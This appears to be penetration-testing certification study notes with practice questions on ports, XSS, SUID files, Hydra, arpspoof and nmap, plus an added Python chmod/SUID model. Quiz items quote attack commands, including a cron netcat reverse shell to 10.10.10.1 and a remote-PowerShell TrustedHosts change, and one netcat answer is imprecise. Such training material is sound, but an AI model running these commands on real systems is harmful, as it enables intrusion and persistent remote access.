ZAP, short for Zed Attack Proxy, is an interception proxy developed by the Open Web Application Security Project (OWASP). It allows penetration testers to intercept, modify, and analyze requests sent from web browsers to web servers, making it a valuable tool for identifying web application vulnerabilities. ZAP supports manual and automated testing
Sticky Bit
a permission setting on a directory. It restricts the ability to delete or rename files in the directory to the file owner, the directory owner, or the root user.
In Linux permissions, the sticky bit is represented by the letter t in the execute (x) position for others. It appears in the file or directory’s permission string when listed with ls -l.
drwxrwxrwt 7 root root 4096 Dec 14 /tmp
SUID file
on Linux with the Set User ID (SUID) bit set. This bit tells the system that the file should execute with the permissions of the file’s owner rather than the user running it. This is particularly useful for files that need root-level privileges to perform specific functions.
The SUID bit is represented as an s in the owner's execute position (e.g., -rwsr-xr-x); a capital S means the bit is set but the owner has no execute permission. A classic example is /usr/bin/passwd, which must update /etc/shadow on behalf of an unprivileged user (illustrative listing; size and date vary by distribution):
-rwsr-xr-x 1 root root 59976 Feb 6 2024 /usr/bin/passwd
find / -type f -perm -4000 2>/dev/null
This locates all regular files with the SUID bit set: -perm -4000 matches any mode that includes the SUID bit, -type f skips directories, and 2>/dev/null discards the permission-denied noise from directories the current user cannot read. Use -perm -2000 for SGID files. Unusual entries in this list (custom binaries, editors, interpreters, anything writable) are prime privilege-escalation candidates.
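A Python model of the permission bits behind the chmod u+x question earlier and the sticky and SUID cards above, added as an example and not part of the page. apply_symbolic implements the u/g/o/a and +/- subset of chmod's symbolic syntax, render_mode reproduces the ls -l permission string including the s, S, t and T markers, and find_suid is the equivalent of find / -type f -perm -4000 using os.walk. The demo creates its own temporary files, so the file names are constructed.

```python
import os
import stat
import tempfile

# rwx bits per class, and the special bit that shows up in that class's x column
WHO_BITS = {
    "u": (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR),
    "g": (stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP),
    "o": (stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH),
}
SPECIAL = {"u": stat.S_ISUID, "g": stat.S_ISGID, "o": stat.S_ISVTX}


def apply_symbolic(mode, spec):
    """Apply a chmod symbolic spec such as 'u+x', 'a+x', 'o-w', 'u+s' or 'o+t'.
    Supports the who letters u, g, o, a and the + and - operators only."""
    who, op, perms = spec[0], spec[1], spec[2:]
    if who not in "ugoa" or op not in "+-" or set(perms) - set("rwxst"):
        raise ValueError(f"unsupported spec: {spec!r}")
    bits = 0
    for w in ("ugo" if who == "a" else who):
        r, wr, x = WHO_BITS[w]
        if "r" in perms:
            bits |= r
        if "w" in perms:
            bits |= wr
        if "x" in perms:
            bits |= x
        if "s" in perms and w in "ug":   # SUID / SGID live in the owner / group classes
            bits |= SPECIAL[w]
    if "t" in perms:                      # the sticky bit is a single flag on the whole mode
        bits |= stat.S_ISVTX
    return mode | bits if op == "+" else mode & ~bits


def render_mode(mode):
    """Produce the 10-character ls -l permission string, including s/S and t/T markers."""
    out = "d" if stat.S_ISDIR(mode) else "-"
    for w in "ugo":
        r, wr, x = WHO_BITS[w]
        out += "r" if mode & r else "-"
        out += "w" if mode & wr else "-"
        special = bool(mode & SPECIAL[w])
        marker = "t" if w == "o" else "s"
        if mode & x:
            out += marker if special else "x"
        else:
            out += marker.upper() if special else "-"   # capital = special bit without execute
    return out


def find_suid(root):
    """Regular files under root with the SUID bit: the same set as
    find root -type f -perm -4000, with unreadable directories skipped."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def demo_find_suid():
    """Constructed demo: one SUID and one ordinary script in a temp dir; returns the SUID names."""
    with tempfile.TemporaryDirectory() as tmp:
        suid_path = os.path.join(tmp, "suid_tool")
        plain_path = os.path.join(tmp, "plain_tool")
        for path in (suid_path, plain_path):
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\necho hello\n")
        os.chmod(suid_path, apply_symbolic(0o755, "u+s"))   # same effect as chmod u+s
        os.chmod(plain_path, 0o755)
        return [os.path.basename(p) for p in find_suid(tmp)]


if __name__ == "__main__":
    print(oct(apply_symbolic(0o644, "u+x")), render_mode(stat.S_IFREG | apply_symbolic(0o644, "u+x")))
    print(render_mode(stat.S_IFREG | 0o4755), render_mode(stat.S_IFDIR | 0o1777))
    print(demo_find_suid())
```

The four chmod answer choices from the earlier question map directly onto apply_symbolic with "u+x", "g+x", "o+x" and "a+x", and rendering the result shows which class each one actually changed.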
Examine the following line of code:
puts(“The system contains several serious vulnerabilities.”)
What programming language is it written in?
A. Python
B. Bash
C. PowerShell
D. Ruby
Ruby
The puts command is used to display output when developing code in Ruby.
During a penetration test, Fred conducts network eavesdropping and manages to obtain an HTTP cookie from web traffic. What attack can he wage using this information?
A. Password cracking
B. Session hijacking
C. On‐path attack
D. Pass‐the‐ticket
Session hijacking
Session hijacking attacks involve stealing the cookie belonging to a valid user and using it to take over the HTTP session. Cookies would not be useful in password cracking attacks because the password has already been exchanged when the user has a cookie. On‐path attacks involve serving as an intermediary in user communication with a server and do not require a valid cookie. Pass‐the‐ticket attacks exploit vulnerabilities in Kerberos, which is not mentioned in this scenario.
During a port scan of a server, Maddox discovered that the following ports are open on the internal network:
TCP port 25
TCP port 80
TCP port 110
TCP port 443
TCP port 1433
TCP port 3389
The scan results provide evidence that a variety of services are running on this server. Which one of the following services is not indicated by the scan results?
A. Web
B. Database
C. SSH
D. RDP
SSH
Web servers commonly run on ports 80 (HTTP) and 443 (HTTPS). Database servers commonly run on ports 1433 (Microsoft SQL Server), 1521 (Oracle), and 3306 (MySQL). Remote Desktop Protocol (RDP) services commonly run on port 3389. There is no evidence that SSH, which uses TCP port 22, is running on this server.
Ports to Remember
- 20, 21
- 22
- 23
- 25
- 53
- 67, 68
- 69
- 80
- 88
- 110
- 123
- 135, 136
- 137, 138, 139
- 161, 162
- 389
- 443
- 445
- 500
- 1433, 1434
- 1521
- 1812, 1813
- 3389
- 8080, 8443
- 20, 21 (TCP/UDP): FTP (File Transfer Protocol) – Data and control channels.
- 22 (TCP/UDP): SSH (Secure Shell).
- 23 (TCP/UDP): Telnet.
- 25 (TCP/UDP): SMTP (Simple Mail Transfer Protocol).
- 53 (UDP): DNS (Domain Name System).
- 67, 68 (TCP/UDP): DHCP (Dynamic Host Configuration Protocol) – Server and client.
- 69 (UDP): TFTP (Trivial File Transfer Protocol).
- 80 (TCP/UDP): HTTP (Hypertext Transfer Protocol).
- 88 (TCP/UDP): Kerberos.
- 110 (TCP/UDP): POP3 (Post Office Protocol 3).
- 123 (TCP/UDP): NTP (Network Time Protocol).
- 135, 136 (TCP/UDP): Microsoft RPC.
- 137, 138, 139 (TCP/UDP): NetBIOS services.
- 143 (TCP): IMAP (Internet Message Access Protocol).
- 161, 162 (UDP): SNMP (Simple Network Management Protocol).
- 389 (TCP/UDP): LDAP (Lightweight Directory Access Protocol).
- 443 (TCP/UDP): HTTPS (Hypertext Transfer Protocol Secure).
- 445 (TCP): SMB (Server Message Block) and Microsoft AD.
- 500 (TCP/UDP): ISAKMP/IKE (Internet Key Exchange).
- 1433, 1434 (TCP/UDP): Microsoft SQL services.
- 1521 (TCP): Oracle database listener.
- 1812, 1813 (TCP/UDP): RADIUS (Remote Authentication Dial-In User Service).
- 3389 (TCP): RDP (Remote Desktop Protocol).
- 8080, 8443 (TCP): Alternative HTTP/HTTPS ports for web services.
Chuck is creating a new cybersecurity testing application and needs a variable that will contain the domain name of a single system. What data type is appropriate for his needs?
A. Integer
B. String
C. Array
D. List
String
A domain name is a text value, so it should be stored in a string variable. Integers are numeric data, so that would not be appropriate in this case. Arrays and lists could contain multiple domain names, but they are too complex for Chuck’s needs.
Jason uses Metasploit’s Mimikatz functionality to dump the following hashes from the Windows SAM on a compromised workstation.
Which of the following tools won’t work to crack the hashes?
A. John the Ripper
B. RainbowCrack
C. hashcat
D. Mimikatz
Mimikatz
Although Mimikatz is an excellent tool for obtaining and using hashes, it doesn’t include hash cracking features like John, RainbowCrack, and hashcat.
Windows SAM
The Windows SAM (Security Accounts Manager) is a database used by Windows to store user account credentials, including password hashes. It resides in the file system, typically located at:
C:\Windows\System32\config\SAM
The SAM file is encrypted and protected to prevent unauthorized access. It contains password hashes rather than plaintext passwords and is commonly targeted by penetration testers or attackers after gaining system-level access. Tools like Mimikatz or Metasploit are often used to dump the SAM file for analysis and potential hash cracking.
Eric is attempting to gain user credentials by tricking the user into providing a password into a fake form field generated through a cross‐site scripting attack. The attack is included in a message posted to an Internet forum. What term can be used to describe this attack?
A. Reflected XSS
B. Stored XSS
C. Consistent XSS
D. Decentralized XSS
Stored XSS
Stored (or persistent) cross‐site scripting (XSS) attacks use content that is stored in a location where the victim is likely to retrieve it. A message board posting fits into this category. Reflected XSS attacks occur when the script is provided to a web application as input that is immediately displayed as output. Consistent and decentralized are not categories of XSS attacks.
Reflected XSS
occurs when malicious input sent to a web server is immediately returned to the victim in the server’s response, without proper validation or sanitization.
- Delivery: Typically via phishing emails, malicious links, or forms.
- Immediate execution: The script is embedded in the server’s response and executes as soon as the victim accesses the crafted link.
- Scope: Affects individual users, not stored on the server.
Stored XSS
occurs when malicious scripts are permanently stored on a server (e.g., in a database, message board, or comment section). When other users access the affected page, the malicious script is executed in their browsers.
- Persistent attack: The malicious payload is stored on the server and affects all users who access the content.
- Higher impact: Can target multiple users over time.
- Common entry points: Input fields like comments, profile updates, or feedback forms.
DOM-Based XSS
occurs when a malicious script is executed entirely on the client side, within the browser’s Document Object Model (DOM). The server does not directly include the malicious payload in its response; instead, the client-side JavaScript processes the input in an insecure way, leading to the execution of malicious code.
- Client-side vulnerability: The issue lies in how the browser’s DOM manipulates or renders user-supplied input.
- No server reflection: The server itself does not send the malicious script. Instead, client-side code dynamically creates or modifies DOM elements based on user input.
- Example sources: window.location, document.URL, or document.referrer.
Renee is conducting reconnaissance of an organization during a penetration test and discovers URLs in the organization’s web applications that have the following format:
https://www.targetorganization.com/referto=www.anothercompany.com
What type of exploit would likely be successful against this application?
A. Unvalidated redirect
B. Cross‐site scripting
C. Command injection
D. Insecure direct object reference
Unvalidated redirect
The presence of another URL (www.anothercompany.com) in the query string indicates that this site may be susceptible to an unvalidated redirect attack. Renee should further test this by attempting to change the URL and determining whether the redirection still takes place.
During a penetration test, Eleanor gains access to the /etc/passwd file on a modern Linux machine. What tool can she use to obtain passwords from the file?
A. Hashcat
B. Mimikatz
C. PowerSploit
D. None of the above
None of the above
Modern Linux systems do not store password hashes in /etc/passwd and instead store them in /etc/shadow. Gaining access to /etc/passwd can be helpful to understand the accounts that a system has provisioned locally and what shells they use, but doing so won’t be useful for actual password recovery in almost all cases.
Jessica plugs her laptop into an accessible network jack at her target organization and then changes her MAC address. What security technology is she most likely trying to bypass?
A. NAC
B. 802.11g
C. WPA
D. Port knocking
NAC
Network Access Control (NAC) systems can use a number of techniques to prevent unknown systems from connecting, but some use MAC address validation as part of their filtering. Of the list of options, the most likely is that Jessica is trying to bypass the organization’s NAC system.
Frank is conducting a penetration test and discovers that the client’s website contains a list of usernames and passwords that is publicly exposed on the Internet. How should Frank communicate this to the client?
A. In the final report
B. In the executive summary
C. Immediately
D. All of the above
All of the above
This is a critical finding and should trigger an immediate communication to the client so that it may be remediated. Frank should also include the finding in the detailed and executive summary sections of the final report, since it is a very significant issue.
What information will the following command sequence gather?
nc 10.10.11.55
GET / HTTP/3.0
A. The web server’s banner
B. The route to the web server
C. The network category of the web server
D. This command is not properly formatted and will not work
The web server’s banner
This command calls Netcat to connect to TCP port 80 on a system with the IP address 10.10.11.55. Presuming this is a web server, the HTTP GET command that follows will fetch the web server’s banner—or at least an error message with useful banner information!
Lucas wants to acquire GPS data from images he discovered on a target website. Which of the following tools is best suited to recovering the metadata he is looking for?
A. strings
B. metascan
C. exiftool
D. grep
exiftool
Exiftool is a quick and easy tool that can allow Lucas to see the metadata embedded in image files. The strings tool can be used to extract text strings from files, but it’s not as useful for metadata recovery. Grep is a search tool, and metascan was made up for this question.
Gary places the following command in the cron.daily file on a Linux system:
45 0 2 * * /bin/nc -e /bin/sh 10.10.10.1 1024
What will occur?
A. Netcat will download a file from 10.10.10.1 every month on the 2nd day of the month.
B. Netcat will open a reverse shell to 10.10.10.1 from port 1024 every day at 12:45 a.m.
C. Netcat will open a reverse shell to 10.10.10.1 on port 1024 every month on the 2nd day of the month.
D. Netcat will grab the banner from 10.10.10.1 every day at 12:45 a.m.
Netcat will open a reverse shell to 10.10.10.1 on port 1024 every month on the 2nd day of the month.
This cronjob runs at 12:45 on the 2nd day of every month and opens a reverse shell to 10.10.10.1 on port 1024.
Isaac runs Hydra against a target system on port 22. What type of attack is he using, and what service is he most likely using it against?
A. SQL injection, a web application
B. SSH injection, an SSH server
C. FTP brute forcing, a secure FTP server
D. SSH brute forcing, an SSH server
SSH brute forcing, an SSH server
Hydra is a brute‐forcing tool, and port 22 is typically associated with SSH. It is most likely that Isaac is attempting to brute‐force an SSH server.
Hydra
widely used brute-force password attack tool designed to crack authentication for various protocols and services, including SSH, HTTP/HTTPS, SMB, and databases. It uses wordlists or dictionaries to test username and password combinations against a target system and supports parallel threads for faster attacks.
Robert runs a port scan of a public‐facing web server from an external IP address and finds that the only two ports accessible on the server are 443 and 1433. What finding can he report based upon this information?
A. Unnecessary open services
B. No multifactor authentication
C. SQL injection vulnerability
D. Weak password complexity
Unnecessary open services
Port 1433 is used to access a database directly and should never be exposed to the Internet. Therefore, Robert may accurately report the use of unnecessary open services. He is not able to confirm the presence of any of the other issues mentioned in the question without further information.
Betsy received a request from her merchant bank for evidence that the organization conducted a penetration test, as required by PCI DSS. What document should Betsy normally provide to the bank as evidence?
A. Executive summary of the final report
B. The full final report
C. Attestation of findings
D. Methodology section of report
Attestation of findings
The attestation of findings is normally used to communicate a summary of findings from the firm conducting penetration testing to a regulatory body. That would be the appropriate document to share in this case.
Greg is preparing to travel to Iran for a penetration testing engagement. What potential issue may impact the tools that he can travel with on his penetration testing laptop?
A. Export restrictions
B. Corporate policies
C. Import restrictions
D. XSD portability issues
Export restrictions
In the United States and other countries, some technologies are covered by export restrictions, prohibiting them from being exported to specific countries. In this case, Iran is a country that is typically on the short list of countries that have export restrictions for many technologies.
Matt wants to conduct a DLL hijacking attack on a Windows system. He wants to take advantage of the default search order for the Windows system. Which of the following locations will be searched first for the DLL?
A. The Windows directory
B. The directories listed in the PATH
C. The Windows system directory
D. The directory the application is in
The directory the application is in
The Windows search order is:
1. the directory the application is in
2. the current directory
3. the Windows system directory
4. the Windows directory
5. any directories listed in the PATH variable.
Charles uses the following command as part of his attack:
arpspoof -i eth0 -t 10.10.1.100 -r 10.1.1.1
What type of attack is he most likely conducting?
A. A DoS attack
B. A VLAN hopping attack
C. An on‐path attack
D. A DHCP spoofing attack
An on‐path attack
Charles is using the arpspoof command to hijack traffic destined for another system, thus allowing him to conduct an on‐path attack.
Mary executes the attack shown here:
An illustration depicts the interaction between a target system and a web server. The target system is on the left, the web server is on the right, and an MITM attacker’s system is in between. A Client Hello message sent from the target reaches the MITM attacker, where it is intercepted and dropped before reaching the web server. The MITM attacker then sends the acknowledgment FIN, ACK to the web server.
What will happen next?
A. The client will reconnect directly to the web server, bypassing the on‐path attacker.
B. The client will send a new ClientHello with a lower TLS version.
C. The client will send a new ClientHello with a higher TLS version.
D. Nothing; the communication has ended after the FIN.
The client will send a new ClientHello with a lower TLS version.
This is an example of an SSL downgrade attack, and Mary is attempting to cause the client to reconnect with a less secure TLS version. The client will attempt to reconnect by sending a new ClientHello with a lower TLS version if it is supported.
Olivia runs the following command on a Windows system:
Set-Item wsman:\localhost\client\trustedhosts 10.45.11.22
What has she enabled?
A. She has opened the Windows firewall to allow 10.45.11.22 in.
B. She has enabled remote PowerShell access from 10.45.11.22.
C. She has allowed all web browsing to 10.45.11.22.
D. None of the above.
She has enabled remote PowerShell access from 10.45.11.22.
If she restarts the Windows Remote Management service after executing her command, Olivia will have remote PowerShell access to the system she ran this command on. Once that is enabled, she can use PowerShell for a multitude of exploits—all from her remote system!
The facility that Phil is targeting has doors that open automatically when staff approach them from inside. What technique can Phil use to exploit these egress sensors?
A. Pick the locks that they control.
B. Short circuit the external control panel.
C. Slide something between the doors and shake it to trip the sensor.
D. Call an employee over so that the doors open.
Slide something between the doors and shake it to trip the sensor.
Although it may seem like an overly simple answer, egress sensors can be tripped by simply sliding something between or under the doors that will be detected by the sensors on the inside of the door. A thin rod or stick with paper on it, or even a helium balloon that is inflated under the door, can be used against egress sensors.
Which one of the following actions is not normally conducted during the post‐engagement cleanup phase of the penetration test?
A. Removing shells
B. Sanitizing documents
C. Deleting accounts
D. Removing tools
Sanitizing documents
Documents created during the test should be preserved as evidence of a successful test and retained according to the organization’s document retention policy. The post‐engagement cleanup phase should include removing any shells, tools, or user accounts created or installed by the penetration testers.
Annie runs an nmap scan using the -T flag set as -T0. Why is she most likely to do that, and what issue may she encounter?
A. She is only scanning TCP ports and may miss services running on UDP ports.
B. She is attempting to avoid IDS systems, and her scan may be very slow.
C. She is attempting to use a TCP timeout scan and may not receive data due to delayed packets.
D. The T flag is not a valid nmap flag, and her scan will error out.
She is attempting to avoid IDS systems, and her scan may be very slow.
The timing settings for nmap determine how quickly scan traffic is sent. -T0 sends a probe every 5 minutes, whereas -T1 sends one every 15 seconds. Both will be very slow for most reasonably sized networks—scanning even the 1,000 default TCP ports a default nmap TCP scan covers will take three and a half days for a single host!
Scott wants to redirect traffic that will go to www.pentest‐example.com to a system he controls. How can he easily accomplish this if he has administrative access to the local system?
A. Change the system’s IP address.
B. Change the system’s host file.
C. Modify the target’s host file.
D. Modify the target’s ARP table.
Change the system’s host file.
Adding an entry to the local hosts file is an easy way to redirect traffic to a system of your choice, and Scott can do this with the administrative access he has acquired.
Cyber Kill Chain steps
- Reconnaissance: Attackers gather information about the target, including open-source intelligence and initial scans of the environment.
- Weaponization: Developing specific tools or payloads to exploit identified vulnerabilities.
- Delivery: Sending the payload to the target via methods such as phishing emails, exploiting network vulnerabilities, or distributing malware.
- Exploitation: Triggering the malicious payload to exploit the target system and gain access.
- Installation: Establishing persistence by creating backdoors or modifying configurations to ensure ongoing access.
- Command and Control (C2): Gaining remote control of the compromised system using tools like remote shells or automated botnet commands.
- Actions on Objectives: Executing the attacker’s goals, such as data theft, system disruption, or further exploitation within the network.
What is the Cyber Kill Chain?
The Cyber Kill Chain is a framework developed by Lockheed Martin to describe the stages of a cyberattack. It provides a structured approach to understanding and disrupting an attack by identifying the steps an attacker typically takes, from initial reconnaissance to achieving their objectives.